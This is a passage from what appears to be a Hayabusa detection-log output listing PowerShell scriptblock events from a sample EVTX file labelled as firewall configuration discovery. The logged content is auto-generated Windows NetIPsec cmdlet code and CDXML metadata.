$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetIKEQMCryptoSet"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetIPsecQuickModeCryptoSet</DefaultNoun> <InstanceCmdlets> <GetCmdletParameters DefaultCmdletParameterSet=""GetAll""> <QueryableProperties> <Property PropertyName=""InstanceID""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Name"" CmdletParameterSets=""ByName"" IsMandatory=""true"" Position=""0"" Aliases=""ID""/> </RegularQuery> </Property> <Property PropertyName=""DisplayName""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByDisplayName"" IsMandatory=""true""/> </RegularQuery> </Property> <Property PropertyName=""Description""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""DisplayGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""RuleGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Group"" CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PfsGroupID""> <Type PSType=""Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup""/> <RegularQuery> <CmdletParameterMetadata PSName=""PerfectForwardSecrecyGroup"" CmdletParameterSets=""ByQuery"" Aliases=""PfsGroup""/> </RegularQuery> </Property> <Property PropertyName=""PrimaryStatus""> <Type PSType=""NetSecurity.PrimaryStatus""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Status""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PolicyStoreSource""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PolicyStoreSourceType""> <Type PSType=""NetSecurity.PolicyStoreType""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> </QueryableProperties> <QueryableAssociations> <Association Association=""MSFT_NetConSecRuleQMCryptoSet"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule""/> <CmdletParameterMetadata PSName=""AssociatedNetIPsecRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetIPsecRule""/> </AssociatedInstance> </Association> </QueryableAssociations> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""TracePolicyStore""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> <Cmdlet> <CmdletMetadata Verb=""Set"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:ModifyInstance""> <Parameters> <Parameter ParameterName=""ElementName""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewDisplayName""/> </Parameter> <Parameter ParameterName=""Description""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Description""/> </Parameter> <Parameter ParameterName=""Proposals""> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance[]""/> <CmdletParameterMetadata PSName=""Proposal""/> </Parameter> <Parameter ParameterName=""PfsGroupID""> <Type PSType=""Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup""/> <CmdletParameterMetadata Aliases=""PfsGroup"" PSName=""PerfectForwardSecrecyGroup""/> </Parameter> </Parameters> </Method> <GetCmdletParameters> <QueryableProperties> <Property PropertyName=""InstanceID""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata Aliases=""ID"" PSName=""Name"" Position=""0"" IsMandatory=""true"" CmdletParameterSets=""ByName""/> </RegularQuery> </Property> <Property PropertyName=""DisplayName""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""DisplayName"" IsMandatory=""true"" CmdletParameterSets=""ByDisplayName""/> </RegularQuery> </Property> <Property PropertyName=""DisplayGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""DisplayGroup"" IsMandatory=""true"" CmdletParameterSets=""ByDisplayGroup""/> </RegularQuery> </Property> <Property PropertyName=""RuleGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Group"" IsMandatory=""true"" CmdletParameterSets=""ByGroup""/> </RegularQuery> </Property> </QueryableProperties> <QueryOptions> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Remove"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:DeleteInstance""/> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Rename"" ConfirmImpact=""Medium""/> <Method MethodName=""Rename""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""NewName""> <Type PSType=""string""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""NewName""/> </Parameter> </Parameters> </Method> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Copy"" ConfirmImpact=""Medium""/> <Method MethodName=""CloneObject""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""NewPolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewPolicyStore""/> </Parameter> <Parameter ParameterName=""NewGPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewGPOSession""/> </Parameter> <Parameter ParameterName=""NewName""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewName""/> </Parameter> </Parameters> </Method> </Cmdlet> </InstanceCmdlets> <StaticCmdlets> <Cmdlet> <CmdletMetadata Verb=""New"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:CreateInstance""> <Parameters> <Parameter ParameterName=""cim:OperationOption:PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""PolicyStore""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""GPOSession""/> </Parameter> <Parameter ParameterName=""InstanceID""> <Type PSType=""string""/> <CmdletParameterMetadata Aliases=""ID"" PSName=""Name""/> </Parameter> <Parameter ParameterName=""ElementName""> <Type PSType=""string""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""DisplayName""/> </Parameter> <Parameter ParameterName=""Description""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Description""/> </Parameter> <Parameter ParameterName=""RuleGroup""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Group""/> </Parameter> <Parameter ParameterName=""Proposals""> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance[]""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""Proposal""/> </Parameter> <Parameter ParameterName=""PfsGroupID""> <Type PSType=""Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup""/> <CmdletParameterMetadata Aliases=""PfsGroup"" PSName=""PerfectForwardSecrecyGroup""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:Default""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata PSName=""Default""/> </Parameter> </Parameters> </Method> </Cmdlet> </StaticCmdlets> </Class> <Enums> <Enum EnumName=""NetSecurity.PrimaryStatus"" UnderlyingType=""uint16""> <Value Name=""Unknown"" Value=""0""/> <Value Name=""OK"" Value=""1""/> <Value Name=""Inactive"" Value=""2""/> <Value Name=""Error"" Value=""3""/> </Enum> <Enum EnumName=""NetSecurity.PolicyStoreType"" UnderlyingType=""uint16""> <Value Name=""None"" Value=""0""/> <Value Name=""Local"" Value=""1""/> <Value Name=""GroupPolicy"" Value=""2""/> <Value Name=""Dynamic"" Value=""3""/> <Value Name=""Generated"" Value=""4""/> <Value Name=""Hardcoded"" Value=""5""/> </Enum> </Enums> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 